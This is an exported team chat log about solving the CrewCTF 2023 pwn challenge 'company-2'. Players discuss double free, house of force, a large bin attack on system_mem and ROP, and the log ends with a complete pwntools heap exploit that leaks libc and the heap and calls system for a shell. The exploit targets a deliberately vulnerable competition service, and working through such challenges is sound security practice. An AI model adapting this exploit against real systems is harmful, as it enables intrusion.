Project Sekai - ✅-pwn-company-2

Project Sekai

🔒 CrewCTF 2023 / ✅-pwn-company-2

Company 2 - 1000 points

Category: Pwn Description: Someone reported to me that i got some bug, i fixed it now! Author : Linz nc company-v2.chal.crewc.tf 17002 Files:

Tags: No tags.

Sutx pinned a message to this channel. 07/08/2023 10:02 AM

@Surg wants to collaborate

10:07

@nyancat0131 wants to collaborate

10:08

@4n0nym4u5 wants to collaborate

  if ( IDX > 0xF )
    return puts("Sorry Not Allowed!");
negative index possible?

@Zafirr wants to collaborate

unsigned op at least in register

10:09

dunno if can do tho

uaf?

10:10

no null on free

10:10

again

maybe can just mod your old exploit a bit lol

nah it doesnt work

10:10

different way for feedback

10:11

this one i think is basically a bunch of heap massaging with the double free

10:11

cause theres no pointers to abuse in the chunk anymore msfrog

msfrog

msfrog

10:13

let me see if i can solve something

10:14

double free

msfrog

10:14

i am stillwaiting for kernel to build

can make size < 72

10:15

to do oob write

10:16

msfrog

10:16

but i'm afraid

10:16

read will return -1

oh

10:32

must use size > 0x500 (edited)

yeah

10:32

thats why i said we need to massage the heap msfrog

msfrog

msfrog

let's see if i can cook

10:40

lol because mmap will actually unmmap so it will crash when setting size to 0

10:40

sad

10:40

cannot cook

i'm getting it

not yet, my method is too slow since requires writing too much data.

12:56

i'll think more after getting some sleep

12:56

~~or maybe it will be magically solved~~

have a nice sleep and carry us :pepaga

oh we can just do house of force on this

17:15

this is a trick i taught this guy lmao

17:15

i made a chall for it a few months back for a local ctf

Zafirr

this is a trick i taught this guy lmao

the author

plagiarism

lmao

17:20

so you can solve ig

yeah i can do it

17:21

gonna eat first though

this still no solve?

house of again…

house of why, god, why?

i actually never used house of force

i'll try it in the meantime

im 1 chunk short

18:54

rewrite exploit time

i got corrupted top size

theres a new check, you need to overwrite av->system_mem first

19:02

with large bin attack

19:02

thats the "trick"

lol

ok i fixed the system mem

19:33

now time to attack

Zafirr

used /ctf solve

✅ Challenge solved.

i hate this challenge

19:42

too many tiny annoyances

what ended up being the final solve?

3.95 KB

19:43

if you can read it xd

why rop

19:54

i tried changing strlen got but it didnt work

19:55

unaligned stack

funny

19:56

i'm trying to use exit list

this challenge's structure layout killed off my attempts to use exit list.

22:10

which i dont really like

you're still trying? xd

cuz environ is

22:10

unstable offset

22:10

i dont wanna predict it

22:10

i wrote rop on local

22:10

but seems the offset is not the same

#!/usr/bin/env python3

from pwn import *

context.terminal = ['tmux', 'sp', '-h', '-p', '80']

#r = process('./company')
r = remote('company-v2.chal.crewc.tf', 17002)
l = ELF('./libc.so.6', False)

def ss(x):
    return str(x).encode('ascii')

def register(idx, size, name, pos, salary):
    r.sendlineafter(b'>> ', b'1')
    r.sendline(ss(idx))
    r.sendline(ss(size))
    r.sendafter(b'Name: ', name)
    r.sendafter(b'Position: ', pos)
    r.sendlineafter(b'Salary: ', ss(salary))

def free(idx):
    r.sendlineafter(b'>> ', b'2')
    r.sendline(ss(idx))

def feedback(idx_self, idx_other, data):
    r.sendlineafter(b'>> ', b'3')
    r.sendline(ss(idx_self))
    r.sendline(ss(idx_other))
    r.send(data)

def view(idx):
    r.sendlineafter(b'>> ', b'4')
    r.sendline(ss(idx))

def mangle(x):
    return ((x << 0x11) | (x >> (64 - 0x11))) & 0xffffffffffffffff

def demangle(x):
    return ((x >> 0x11) | (x << (64 - 0x11))) & 0xffffffffffffffff

r.sendlineafter(b'name? ', b'HR')

register(0, 0x508, b'0', b'0', 0)
register(1, 0x528, b'1', b'1', 1) # p1
free(0)
free(1)
register(2, 0xA38, b'\xe0', b'HR', 2)
register(3, 0x508, b'3', b'3', 3) # g1

view(0)
r.recvuntil(b'Name: ')
l.address = u64(r.recvn(6) + b'\x00\x00') - 0x1f6ce0
log.info('libc = 0x%x', l.address)

feedback(0, 2, b'\x00' * 0x4d0 + p64(0x21))
free(1)
view(1)
r.recvuntil(b'Name: ')
heap = u64(r.recvn(5) + b'\x00\x00\x00') << 12
log.info('heap = 0x%x', heap)

register(4, 0x518, b'4', b'4', 4) # p2
register(5, 0x508, b'5', b'5', 5) # g2

feedback(0, 2, b'\x00' * 0x4d0 + p64(0x531))
free(1)
register(6, 0x538, b'6', b'6', 6) # g3

free(4)
feedback(0, 2, b'\x00' * 0x4d0 + p64(0x531) + p64(l.address + 0x1f7110) + p64(l.address + 0x1f7110) + p64(0) + p64(l.address + 0x1f7508 - 0x20))
register(7, 0x538, b'7', b'7', 7) # g4

free(7)
free(6)
register(8, 0xA80, b'\xe0', b'HR', 8)
feedback(6, 8, b'\x00' * 0x528 + p64(0x20000))
feedback(6, 7, b'\x00' * 0x510 + p64(0x550000000000))

evil_size = (l.symbols['environ'] - 0x10) - 8 * 4 - (heap + 0x26a0)
register(9, evil_size, b'9', b'9', 9)
register(10, 0x538, b'A' * 0x10, b'\x00', 0)
view(10)
r.recvuntil(b'A' * 0x10)
environ = u64(r.recvn(6) + b'\x00\x00')
log.info("environ = 0x%x", environ)

evil_size = (environ - 0x138) - 8 * 4 - (l.address + 0x1fe840)
register(11, evil_size, b'\x00', b'\x00', 0)
register(12, 0x538, b'\x00', b'\x00', l.address + 0x34589) # add rsp, 0x18 ; ret
feedback(0, 12, p64(l.address + 0x22fd9) + p64(l.address + 0x240e5) + p64(l.address + 0x1B51D2) + p64(l.symbols['system']))

r.sendlineafter(b'>> ', b'6')
r.interactive()

22:21

my exploit

22:21

i hate this ctf

22:22

actually i have skill issue

22:22

msfrog

Exported 90 message(s)